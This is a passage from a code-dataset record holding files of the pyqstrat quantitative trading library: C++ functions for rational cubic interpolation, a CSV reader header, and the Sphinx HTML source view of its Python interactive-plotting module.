std::max(r1, r2));\n}\n\ndouble convex_rational_cubic_control_parameter_to_fit_second_derivative_at_left_side(double x_l, double x_r, double y_l, double y_r, double d_l, double d_r, double second_derivative_l, bool preferShapePreservationOverSmoothness) {\n const double r = rational_cubic_control_parameter_to_fit_second_derivative_at_left_side(x_l, x_r, y_l, y_r, d_l, d_r, second_derivative_l);\n const double r_min = minimum_rational_cubic_control_parameter(d_l, d_r, (y_r-y_l)/(x_r-x_l), preferShapePreservationOverSmoothness);\n return std::max(r,r_min);\n}\n\ndouble convex_rational_cubic_control_parameter_to_fit_second_derivative_at_right_side(double x_l, double x_r, double y_l, double y_r, double d_l, double d_r, double second_derivative_r, bool preferShapePreservationOverSmoothness) {\n const double r = rational_cubic_control_parameter_to_fit_second_derivative_at_right_side(x_l, x_r, y_l, y_r, d_l, d_r, second_derivative_r);\n const double r_min = minimum_rational_cubic_control_parameter(d_l, d_r, (y_r-y_l)/(x_r-x_l), preferShapePreservationOverSmoothness);\n return std::max(r,r_min);\n}\n" }, { "alpha_fraction": 0.5669724941253662, "alphanum_fraction": 0.5779816508293152, "avg_line_length": 20.799999237060547, "blob_id": "6a4943dbd830d56a29349d3ff9daa4e5aff61e48", "content_id": "f905165b75d56095140f2aa1a0a51e61cfbad71b", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 545, "license_type": "permissive", "max_line_length": 53, "num_lines": 25, "path": "/pyqstrat/cpp/io/csv_reader.hpp", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "//\n// csv_reader.hpp\n// py_c_test\n//\n// Created by Sal Abbasi on 9/12/22.\n//\n\n#ifndef csv_reader_hpp\n#define csv_reader_hpp\n\n#include <vector>\n#include <string>\n\nbool read_csv(const std::string& filename,\n const std::vector<int>& col_indices,\n const std::vector<std::string>& dtypes,\n char separator,\n int skip_rows,\n int max_rows,\n std::vector<void*>& output);\n\nvoid test_csv_reader();\nvoid test_csv_reader2();\nvoid test_csv_reader_zip();\n#endif /* csv_reader_hpp */\n" }, { "alpha_fraction": 0.6046701669692993, "alphanum_fraction": 0.6133246421813965, "avg_line_length": 165.7655029296875, "blob_id": "fa72d0dcff0cbb2ad30e1ec874f13bc8ed939914", "content_id": "c96551237513f3f30bcfa7d6907b691c1f03afd6", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 110232, "license_type": "permissive", "max_line_length": 1032, "num_lines": 661, "path": "/docs/_modules/pyqstrat/interactive_plot.html", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "\n<!DOCTYPE html>\n\n<html lang=\"en\">\n <head>\n <meta charset=\"utf-8\" />\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <title>pyqstrat.interactive_plot &#8212; pyqstrat 0.1.0 documentation</title>\n <link rel=\"stylesheet\" type=\"text/css\" href=\"../../_static/pygments.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"../../_static/alabaster.css\" />\n <script data-url_root=\"../../\" id=\"documentation_options\" src=\"../../_static/documentation_options.js\"></script>\n <script src=\"../../_static/jquery.js\"></script>\n <script src=\"../../_static/underscore.js\"></script>\n <script src=\"../../_static/_sphinx_javascript_frameworks_compat.js\"></script>\n <script src=\"../../_static/doctools.js\"></script>\n <link rel=\"index\" title=\"Index\" href=\"../../genindex.html\" />\n <link rel=\"search\" title=\"Search\" href=\"../../search.html\" />\n \n <link rel=\"stylesheet\" href=\"../../_static/custom.css\" type=\"text/css\" />\n \n \n <meta name=\"viewport\" content=\"width=device-width, initial-scale=0.9, maximum-scale=0.9\" />\n\n </head><body>\n \n\n <div class=\"document\">\n <div class=\"documentwrapper\">\n <div class=\"bodywrapper\">\n \n\n <div class=\"body\" role=\"main\">\n \n <h1>Source code for pyqstrat.interactive_plot</h1><div class=\"highlight\"><pre>\n<span></span><span class=\"c1\"># $$_ Lines starting with # $$_* autogenerated by jup_mini. Do not modify these</span>\n<span class=\"c1\"># $$_markdown</span>\n<span class=\"c1\"># # Interactive Plot</span>\n<span class=\"c1\"># $$_end_markdown</span>\n<span class=\"c1\"># $$_markdown</span>\n<span class=\"c1\"># # Description</span>\n<span class=\"c1\"># </span>\n<span class=\"c1\"># Allows interactive plotting of multidimensional data</span>\n<span class=\"c1\"># $$_end_markdown</span>\n<span class=\"c1\"># $$_code</span>\n<span class=\"c1\"># $$_ %%checkall</span>\n<span class=\"kn\">from</span> <span class=\"nn\">__future__</span> <span class=\"kn\">import</span> <span class=\"n\">annotations</span>\n<span class=\"kn\">import</span> <span class=\"nn\">os</span>\n<span class=\"kn\">import</span> <span class=\"nn\">sys</span>\n<span class=\"kn\">import</span> <span class=\"nn\">math</span>\n<span class=\"kn\">import</span> <span class=\"nn\">colorsys</span>\n<span class=\"kn\">from</span> <span class=\"nn\">dataclasses</span> <span class=\"kn\">import</span> <span class=\"n\">dataclass</span>\n<span class=\"kn\">import</span> <span class=\"nn\">unittest</span>\n<span class=\"kn\">import</span> <span class=\"nn\">doctest</span>\n<span class=\"kn\">import</span> <span class=\"nn\">pandas</span> <span class=\"k\">as</span> <span class=\"nn\">pd</span>\n<span class=\"kn\">import</span> <span class=\"nn\">numpy</span> <span class=\"k\">as</span> <span class=\"nn\">np</span>\n<span class=\"kn\">from</span> <span class=\"nn\">IPython.display</span> <span class=\"kn\">import</span> <span class=\"n\">display</span><span class=\"p\">,</span> <span class=\"n\">clear_output</span>\n<span class=\"kn\">from</span> <span class=\"nn\">ipywidgets</span> <span class=\"kn\">import</span> <span class=\"n\">widgets</span>\n<span class=\"kn\">import</span> <span class=\"nn\">plotly</span>\n<span class=\"kn\">import</span> <span class=\"nn\">plotly.callbacks</span>\n<span class=\"kn\">import</span> <span class=\"nn\">plotly.graph_objects</span> <span class=\"k\">as</span> <span class=\"nn\">go</span>\n<span class=\"kn\">from</span> <span class=\"nn\">plotly.subplots</span> <span class=\"kn\">import</span> <span class=\"n\">make_subplots</span>\n<span class=\"kn\">from</span> <span class=\"nn\">typing</span> <span class=\"kn\">import</span> <span class=\"n\">Callable</span><span class=\"p\">,</span> <span class=\"n\">Any</span>\n<span class=\"kn\">from</span> <span class=\"nn\">collections.abc</span> <span class=\"kn\">import</span> <span class=\"n\">Sequence</span>\n<span class=\"kn\">import</span> <span class=\"nn\">traitlets</span>\n<span class=\"kn\">from</span> <span class=\"nn\">pyqstrat.pq_utils</span> <span class=\"kn\">import</span> <span class=\"n\">bootstrap_ci</span><span class=\"p\">,</span> <span class=\"n\">get_child_logger</span>\n\n<span class=\"n\">ROOT_DIR</span> <span class=\"o\">=</span> <span class=\"n\">os</span><span class=\"o\">.</span><span class=\"n\">path</span><span class=\"o\">.</span><span class=\"n\">join</span><span class=\"p\">(</span><span class=\"n\">sys</span><span class=\"o\">.</span><span class=\"n\">path</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">])</span>\n<span class=\"n\">sys</span><span class=\"o\">.</span><span class=\"n\">path</span><span class=\"o\">.</span><span class=\"n\">insert</span><span class=\"p\">(</span><span class=\"mi\">1</span><span class=\"p\">,</span> <span class=\"n\">ROOT_DIR</span><span class=\"p\">)</span>\n\n<span class=\"n\">_logger</span> <span class=\"o\">=</span> <span class=\"n\">get_child_logger</span><span class=\"p\">(</span><span class=\"vm\">__name__</span><span class=\"p\">)</span>\n\n<span class=\"n\">DEFAULT_PLOTLY_COLORS</span> <span class=\"o\">=</span> <span class=\"p\">[</span><span class=\"s1\">&#39;rgb(31, 119, 180)&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;rgb(255, 127, 14)&#39;</span><span class=\"p\">,</span>\n <span class=\"s1\">&#39;rgb(44, 160, 44)&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;rgb(214, 39, 40)&#39;</span><span class=\"p\">,</span>\n <span class=\"s1\">&#39;rgb(148, 103, 189)&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;rgb(140, 86, 75)&#39;</span><span class=\"p\">,</span>\n <span class=\"s1\">&#39;rgb(227, 119, 194)&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;rgb(127, 127, 127)&#39;</span><span class=\"p\">,</span>\n <span class=\"s1\">&#39;rgb(188, 189, 34)&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;rgb(23, 190, 207)&#39;</span><span class=\"p\">]</span>\n\n<span class=\"n\">LineDataType</span> <span class=\"o\">=</span> <span class=\"nb\">tuple</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">,</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"n\">Any</span><span class=\"p\">,</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">]]</span>\n \n<span class=\"n\">DimensionFilterType</span> <span class=\"o\">=</span> <span class=\"n\">Callable</span><span class=\"p\">[[</span>\n <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">,</span>\n <span class=\"nb\">str</span><span class=\"p\">,</span>\n <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"nb\">tuple</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">Any</span><span class=\"p\">]]],</span>\n <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">ndarray</span><span class=\"p\">]</span>\n\n<span class=\"n\">DataFilterType</span> <span class=\"o\">=</span> <span class=\"n\">Callable</span><span class=\"p\">[[</span>\n <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">,</span>\n <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"nb\">tuple</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">Any</span><span class=\"p\">]]],</span>\n <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">]</span>\n\n<span class=\"n\">StatFuncType</span> <span class=\"o\">=</span> <span class=\"n\">Callable</span><span class=\"p\">[[</span><span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">,</span> <span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"nb\">str</span><span class=\"p\">],</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"n\">LineDataType</span><span class=\"p\">]]</span>\n\n<span class=\"n\">DetailDisplayType</span> <span class=\"o\">=</span> <span class=\"n\">Callable</span><span class=\"p\">[[</span>\n <span class=\"n\">widgets</span><span class=\"o\">.</span><span class=\"n\">Widget</span><span class=\"p\">,</span> \n <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">,</span>\n <span class=\"nb\">bool</span><span class=\"p\">],</span>\n <span class=\"kc\">None</span><span class=\"p\">]</span>\n\n\n<span class=\"n\">PlotFuncType</span> <span class=\"o\">=</span> <span class=\"n\">Callable</span><span class=\"p\">[[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"n\">LineDataType</span><span class=\"p\">]],</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"n\">widgets</span><span class=\"o\">.</span><span class=\"n\">Widget</span><span class=\"p\">]]</span>\n\n<span class=\"n\">DataFrameTransformFuncType</span> <span class=\"o\">=</span> <span class=\"n\">Callable</span><span class=\"p\">[[</span><span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">],</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">]</span>\n\n<span class=\"n\">SeriesTransformFuncType</span> <span class=\"o\">=</span> <span class=\"n\">Callable</span><span class=\"p\">[[</span><span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">Series</span><span class=\"p\">],</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">Series</span><span class=\"p\">]</span>\n\n<span class=\"n\">DisplayFormFuncType</span> <span class=\"o\">=</span> <span class=\"n\">Callable</span><span class=\"p\">[[</span><span class=\"n\">Sequence</span><span class=\"p\">[</span><span class=\"n\">widgets</span><span class=\"o\">.</span><span class=\"n\">Widget</span><span class=\"p\">],</span> <span class=\"nb\">bool</span><span class=\"p\">],</span> <span class=\"kc\">None</span><span class=\"p\">]</span>\n\n<span class=\"n\">UpdateFormFuncType</span> <span class=\"o\">=</span> <span class=\"n\">Callable</span><span class=\"p\">[[</span><span class=\"nb\">int</span><span class=\"p\">],</span> <span class=\"kc\">None</span><span class=\"p\">]</span>\n\n<span class=\"n\">CreateSelectionWidgetsFunctype</span> <span class=\"o\">=</span> <span class=\"n\">Callable</span><span class=\"p\">[[</span><span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"nb\">str</span><span class=\"p\">],</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"nb\">str</span><span class=\"p\">],</span> <span class=\"n\">UpdateFormFuncType</span><span class=\"p\">],</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">Any</span><span class=\"p\">]]</span>\n\n\n<div class=\"viewcode-block\" id=\"percentile_buckets\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.percentile_buckets\">[docs]</a><span class=\"k\">def</span> <span class=\"nf\">percentile_buckets</span><span class=\"p\">(</span><span class=\"n\">a</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">ndarray</span><span class=\"p\">,</span> <span class=\"n\">n</span><span class=\"o\">=</span><span class=\"mi\">10</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">ndarray</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> &gt;&gt;&gt; np.random.seed(0)</span>\n<span class=\"sd\"> &gt;&gt;&gt; a = np.random.uniform(size=10000)</span>\n<span class=\"sd\"> &gt;&gt;&gt; assert np.allclose(np.unique(percentile_buckets(a)), np.arange(0.05, 1, 0.1), atol=0.01)</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"k\">if</span> <span class=\"ow\">not</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">a</span><span class=\"p\">):</span> <span class=\"k\">return</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">empty</span><span class=\"p\">(</span><span class=\"mi\">0</span><span class=\"p\">)</span>\n <span class=\"n\">pctiles</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">arange</span><span class=\"p\">(</span><span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"mi\">100</span><span class=\"p\">,</span> <span class=\"nb\">int</span><span class=\"p\">(</span><span class=\"nb\">round</span><span class=\"p\">(</span><span class=\"mi\">100</span> <span class=\"o\">/</span> <span class=\"n\">n</span><span class=\"p\">)))</span> \n <span class=\"n\">buckets</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">nanpercentile</span><span class=\"p\">(</span><span class=\"n\">a</span><span class=\"p\">,</span> <span class=\"n\">pctiles</span><span class=\"p\">)</span>\n <span class=\"n\">conditions</span><span class=\"p\">:</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"n\">Any</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"p\">[]</span>\n <span class=\"k\">for</span> <span class=\"n\">i</span><span class=\"p\">,</span> <span class=\"n\">bucket</span> <span class=\"ow\">in</span> <span class=\"nb\">enumerate</span><span class=\"p\">(</span><span class=\"n\">buckets</span><span class=\"p\">[:</span><span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">]):</span>\n <span class=\"k\">if</span> <span class=\"n\">buckets</span><span class=\"p\">[</span><span class=\"n\">i</span><span class=\"p\">]</span> <span class=\"o\">==</span> <span class=\"n\">buckets</span><span class=\"p\">[</span><span class=\"n\">i</span> <span class=\"o\">+</span> <span class=\"mi\">1</span><span class=\"p\">]:</span>\n <span class=\"n\">conditions</span><span class=\"o\">.</span><span class=\"n\">append</span><span class=\"p\">(</span><span class=\"n\">a</span> <span class=\"o\">==</span> <span class=\"n\">buckets</span><span class=\"p\">[</span><span class=\"n\">i</span><span class=\"p\">])</span>\n <span class=\"k\">else</span><span class=\"p\">:</span>\n <span class=\"n\">conditions</span><span class=\"o\">.</span><span class=\"n\">append</span><span class=\"p\">((</span><span class=\"n\">a</span> <span class=\"o\">&gt;=</span> <span class=\"n\">buckets</span><span class=\"p\">[</span><span class=\"n\">i</span><span class=\"p\">])</span> <span class=\"o\">&amp;</span> <span class=\"p\">(</span><span class=\"n\">a</span> <span class=\"o\">&lt;</span> <span class=\"n\">buckets</span><span class=\"p\">[</span><span class=\"n\">i</span> <span class=\"o\">+</span> <span class=\"mi\">1</span><span class=\"p\">]))</span>\n <span class=\"n\">conditions</span><span class=\"o\">.</span><span class=\"n\">append</span><span class=\"p\">((</span><span class=\"n\">a</span> <span class=\"o\">&gt;=</span> <span class=\"n\">buckets</span><span class=\"p\">[</span><span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">]))</span>\n <span class=\"n\">b</span> <span class=\"o\">=</span> <span class=\"p\">[</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">mean</span><span class=\"p\">(</span><span class=\"n\">a</span><span class=\"p\">[</span><span class=\"n\">cond</span><span class=\"p\">])</span> <span class=\"k\">for</span> <span class=\"n\">cond</span> <span class=\"ow\">in</span> <span class=\"n\">conditions</span><span class=\"p\">]</span>\n <span class=\"n\">ret</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">select</span><span class=\"p\">(</span><span class=\"n\">conditions</span><span class=\"p\">,</span> <span class=\"n\">b</span><span class=\"p\">)</span>\n <span class=\"k\">return</span> <span class=\"n\">ret</span></div>\n\n\n<div class=\"viewcode-block\" id=\"display_form\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.display_form\">[docs]</a><span class=\"k\">def</span> <span class=\"nf\">display_form</span><span class=\"p\">(</span><span class=\"n\">form_widgets</span><span class=\"p\">:</span> <span class=\"n\">Sequence</span><span class=\"p\">[</span><span class=\"n\">widgets</span><span class=\"o\">.</span><span class=\"n\">Widget</span><span class=\"p\">],</span> <span class=\"n\">debug</span><span class=\"o\">=</span><span class=\"kc\">False</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"k\">if</span> <span class=\"ow\">not</span> <span class=\"n\">debug</span><span class=\"p\">:</span> <span class=\"n\">clear_output</span><span class=\"p\">()</span>\n <span class=\"n\">box_layout</span> <span class=\"o\">=</span> <span class=\"n\">widgets</span><span class=\"o\">.</span><span class=\"n\">Layout</span><span class=\"p\">(</span>\n <span class=\"n\">display</span><span class=\"o\">=</span><span class=\"s1\">&#39;flex&#39;</span><span class=\"p\">,</span>\n <span class=\"n\">flex_flow</span><span class=\"o\">=</span><span class=\"s1\">&#39;column&#39;</span><span class=\"p\">,</span>\n <span class=\"n\">align_items</span><span class=\"o\">=</span><span class=\"s1\">&#39;stretch&#39;</span><span class=\"p\">,</span>\n <span class=\"n\">border</span><span class=\"o\">=</span><span class=\"s1\">&#39;solid&#39;</span><span class=\"p\">,</span>\n <span class=\"n\">width</span><span class=\"o\">=</span><span class=\"s1\">&#39;100%&#39;</span><span class=\"p\">)</span>\n <span class=\"n\">box</span> <span class=\"o\">=</span> <span class=\"n\">widgets</span><span class=\"o\">.</span><span class=\"n\">Box</span><span class=\"p\">(</span><span class=\"n\">children</span><span class=\"o\">=</span><span class=\"nb\">list</span><span class=\"p\">(</span><span class=\"n\">form_widgets</span><span class=\"p\">),</span> <span class=\"n\">layout</span><span class=\"o\">=</span><span class=\"n\">box_layout</span><span class=\"p\">)</span>\n <span class=\"n\">display</span><span class=\"p\">(</span><span class=\"n\">box</span><span class=\"p\">)</span></div>\n \n \n<div class=\"viewcode-block\" id=\"SimpleTransform\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.SimpleTransform\">[docs]</a><span class=\"k\">class</span> <span class=\"nc\">SimpleTransform</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Initial transformation of data. For example, you might add columns that are quantiles of other columns</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n<div class=\"viewcode-block\" id=\"SimpleTransform.__init__\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.SimpleTransform.__init__\">[docs]</a> <span class=\"k\">def</span> <span class=\"fm\">__init__</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">transforms</span><span class=\"p\">:</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"nb\">tuple</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">SeriesTransformFuncType</span><span class=\"p\">]]</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">transforms</span> <span class=\"o\">=</span> <span class=\"p\">[]</span> <span class=\"k\">if</span> <span class=\"n\">transforms</span> <span class=\"ow\">is</span> <span class=\"kc\">None</span> <span class=\"k\">else</span> <span class=\"n\">transforms</span></div>\n \n<div class=\"viewcode-block\" id=\"SimpleTransform.__call__\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.SimpleTransform.__call__\">[docs]</a> <span class=\"k\">def</span> <span class=\"fm\">__call__</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">data</span><span class=\"p\">:</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">:</span>\n <span class=\"k\">for</span> <span class=\"p\">(</span><span class=\"n\">colname</span><span class=\"p\">,</span> <span class=\"n\">new_colname</span><span class=\"p\">,</span> <span class=\"n\">func</span><span class=\"p\">)</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">transforms</span><span class=\"p\">:</span>\n <span class=\"n\">data</span><span class=\"p\">[</span><span class=\"n\">new_colname</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"n\">func</span><span class=\"p\">(</span><span class=\"n\">data</span><span class=\"p\">[</span><span class=\"n\">colname</span><span class=\"p\">])</span>\n <span class=\"k\">return</span> <span class=\"n\">data</span></div></div>\n \n\n<div class=\"viewcode-block\" id=\"simple_dimension_filter\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.simple_dimension_filter\">[docs]</a><span class=\"k\">def</span> <span class=\"nf\">simple_dimension_filter</span><span class=\"p\">(</span><span class=\"n\">data</span><span class=\"p\">:</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">,</span> <span class=\"n\">dim_name</span><span class=\"p\">:</span> <span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">selected_values</span><span class=\"p\">:</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"nb\">tuple</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">Any</span><span class=\"p\">]])</span> <span class=\"o\">-&gt;</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">ndarray</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Produces a list to put into a dropdown for selecting a dimension value</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"n\">mask</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">full</span><span class=\"p\">(</span><span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">data</span><span class=\"p\">),</span> <span class=\"kc\">True</span><span class=\"p\">)</span>\n <span class=\"k\">for</span> <span class=\"n\">name</span><span class=\"p\">,</span> <span class=\"n\">value</span> <span class=\"ow\">in</span> <span class=\"n\">selected_values</span><span class=\"p\">:</span>\n <span class=\"k\">if</span> <span class=\"n\">value</span> <span class=\"o\">==</span> <span class=\"s1\">&#39;All&#39;</span><span class=\"p\">:</span> <span class=\"k\">continue</span>\n <span class=\"n\">mask</span> <span class=\"o\">&amp;=</span> <span class=\"p\">(</span><span class=\"n\">data</span><span class=\"p\">[</span><span class=\"n\">name</span><span class=\"p\">]</span> <span class=\"o\">==</span> <span class=\"n\">value</span><span class=\"p\">)</span>\n <span class=\"n\">values</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">unique</span><span class=\"p\">(</span><span class=\"n\">data</span><span class=\"p\">[</span><span class=\"n\">mask</span><span class=\"p\">][</span><span class=\"n\">dim_name</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">)</span> <span class=\"c1\"># will sort values before returning them</span>\n <span class=\"k\">return</span> <span class=\"p\">[</span><span class=\"s1\">&#39;All&#39;</span><span class=\"p\">]</span> <span class=\"o\">+</span> <span class=\"n\">values</span><span class=\"o\">.</span><span class=\"n\">tolist</span><span class=\"p\">()</span></div>\n \n \n<div class=\"viewcode-block\" id=\"simple_data_filter\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.simple_data_filter\">[docs]</a><span class=\"k\">def</span> <span class=\"nf\">simple_data_filter</span><span class=\"p\">(</span><span class=\"n\">data</span><span class=\"p\">:</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">,</span> <span class=\"n\">selected_values</span><span class=\"p\">:</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"nb\">tuple</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">Any</span><span class=\"p\">]])</span> <span class=\"o\">-&gt;</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Filters a dataframe based on the selected values</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"n\">mask</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">full</span><span class=\"p\">(</span><span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">data</span><span class=\"p\">),</span> <span class=\"kc\">True</span><span class=\"p\">)</span>\n <span class=\"k\">for</span> <span class=\"n\">name</span><span class=\"p\">,</span> <span class=\"n\">value</span> <span class=\"ow\">in</span> <span class=\"n\">selected_values</span><span class=\"p\">:</span>\n <span class=\"k\">if</span> <span class=\"n\">value</span> <span class=\"o\">==</span> <span class=\"s1\">&#39;All&#39;</span><span class=\"p\">:</span> <span class=\"k\">continue</span>\n <span class=\"n\">mask</span> <span class=\"o\">&amp;=</span> <span class=\"p\">(</span><span class=\"n\">data</span><span class=\"p\">[</span><span class=\"n\">name</span><span class=\"p\">]</span> <span class=\"o\">==</span> <span class=\"n\">value</span><span class=\"p\">)</span>\n <span class=\"k\">return</span> <span class=\"n\">data</span><span class=\"p\">[</span><span class=\"n\">mask</span><span class=\"p\">]</span></div>\n \n \n<div class=\"viewcode-block\" id=\"MeanWithCI\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.MeanWithCI\">[docs]</a><span class=\"k\">class</span> <span class=\"nc\">MeanWithCI</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Computes mean (or median) and optionally confidence intervals for plotting</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n<div class=\"viewcode-block\" id=\"MeanWithCI.__init__\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.MeanWithCI.__init__\">[docs]</a> <span class=\"k\">def</span> <span class=\"fm\">__init__</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">mean_func</span><span class=\"p\">:</span> <span class=\"n\">Callable</span><span class=\"p\">[[</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">ndarray</span><span class=\"p\">],</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">ndarray</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">nanmean</span><span class=\"p\">,</span> <span class=\"n\">ci_level</span><span class=\"p\">:</span> <span class=\"nb\">int</span> <span class=\"o\">=</span> <span class=\"mi\">0</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span 